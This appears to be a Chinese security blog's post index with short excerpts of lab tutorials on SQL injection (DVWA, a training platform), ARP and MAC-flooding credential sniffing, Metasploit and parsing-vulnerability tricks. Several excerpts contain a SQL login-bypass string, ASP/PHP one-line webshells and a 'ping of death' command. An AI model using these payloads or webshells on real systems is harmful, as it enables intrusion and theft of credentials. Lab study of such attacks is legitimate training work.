- 博客(12)
- 收藏
- 关注
RSS订阅原创 DVWA靶机sql注入
1,将dvwa的安全等级改为low2,查看源代码,发现没有过滤3,输入1,判断注入类型是数字型还是字符型发现返回,得知是数字型。4,1’ 报错得知存在注入点5,输入1’ order by 1#6,输入1’ order by 2#7,输入 1’ order by 3# 报错,得知字段不超过3。8,输入 1’ union select 1,2# 返回1和29,输入 1...
2019-01-16 15:13:57
2729
原创 墨者学院-SQL手工注入漏洞测试(MySQL数据库)
1,http://219.153.49.228:48730/new_list.php?id=1 and 1=1 不报错http://219.153.49.228:48730/new_list.php?id=1 and 1=2 报错,发现注入点2,http://219.153.49.228:48730/new_list.php?...
2019-01-16 14:23:53
3061
2
原创 ARP攻击,监听账号和密码。
1,使用的工具使用模拟器ensp,虚拟机vm,VirtualBox。2,新建拓扑图如下:交换机使用华为s3700云配置如下:绑定网卡是virualbox的虚拟网卡,并加上udp端口,下面的端口映射,出端口选择2,并点上双向通道,形成映射。其他两个云类似。用真实网卡做实验会影响自己的真实网络,并且在抓包的时候数据过多,不容易观察。3,vm虚拟机里的设置需要安装xp,kali系统,具...
2019-01-15 14:29:46
820
原创 MAC地址泛洪攻击,监听用户名和密码。
1,使用的工具使用模拟器ensp,虚拟机vm,VirtualBox。2,新建拓扑图如下:交换机使用华为s3700云配置如下:绑定网卡是virualbox的虚拟网卡,并加上udp端口,下面的端口映射,出端口选择2,并点上双向通道,形成映射。其他两个云类似。用真实网卡做实验会影响自己的真实网络,并且在抓包的时候数据过多,不容易观察。3,vm虚拟机里的设置需要安装xp,kali系统,具...
2019-01-15 12:32:23
1538
原创 Metasploit常用漏洞利用命令
Metasploit常用漏洞利用命令(1)search< name >用指定关键字搜索可利用漏洞use < exploit name >使用漏洞show options显示选项set < option name > < option >设置选项show payloads 显示装置Metasploit常用漏洞利用命令(2)sh...
2019-01-11 10:40:18
1587
原创 万能用户名和万能密码
万能用户名any’ union select * from user – (后面有个注释符)联合查询,是查询的结果大于1,为真万能用户名防御PDO$username=$REQUEST['usernm'];$password=$_REQUEST['passwd'];$pdo=new PDO("mssql:host=127.0.0.1;dbname=users","sa","root")..
2019-01-11 10:23:46
11002
1
原创 一句话木马
asp一句话木马<%eval request(“pass”)%><%eval(Request.Item[“value”]%>木马解释<%execute(request(“pass”))%>request(“pass”)接收客户端提交的数据,pass为执行命令的参数值。eval/execute 函数执行客户端命令的内容php一句话木马&...
2019-01-11 09:52:18
2494
1
原创 常用的DOS命令
color 改变cmd颜色ping -t -l 65500 ip 死亡之pingipconfig 查看ipipconfig /release 释放ipipconfig /renew 重新获得ipsystminfo 查看系统信息arp -anet view 查看局域网内其他计算机shutdown -s -t 180 -c “你被黑了,请立刻关机”dir 查看目录cd 切换...
2019-01-11 09:45:19
310
原创 解析漏洞!
IIS 5.X/6.0 解析漏洞1,目录解析:/test.asp/1.jpg2,分号后不解析:test.asp;.jpg3,默认解析test.asa /test.cer /test.cdxIIS 7.0/IIS7.5/Nginx<0.8.3 畸形解析漏洞(默认Fast-GGI开启的状态下)Nginx,Apache解析漏洞Nginx < 8.03空字节代码执...
2019-01-11 09:43:59
249
原创 linux忘记密码后怎么修改密码?
1,当显示这个界面时按E键2,接着出现这个界面接着按E键3,出现下面界面选择第二项,按E键4,出现下面界面按空格建然后输入s5,接着返回上面第三步界面按B键,进入单一模式(命令行模式)6,出现这个界面输入password修改用户密码7,reboot重启...
2019-01-11 09:33:08
811
原创 linux常用命令
linux常用命令cat /proc/cpuinfo 查看cpu信息cat /proc/meminfo 查看内存信息uname -r 查看内核版本号uname -a 查看内核详细信息shutdown -h now 关机po...
2019-01-11 09:28:54
155
原创 简单轻松的复制文件到kali(开启ssh服务)
简单轻松的复制文件到kali(开启ssh服务)装vmtools出现问题,也可以通过ssh控制kali并复制文件到kali里。不用辛苦的装vmtools首先确保虚拟机里的kali和真实主机的网络是通的,然后到kali里开启ssh,开启ssh命令需要修改一下。首先敲打命令 vim /etc/ssh/sshd_config将#PasswordAuthentication yes 前的注释符#去...
2018-11-29 23:57:36
7359
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人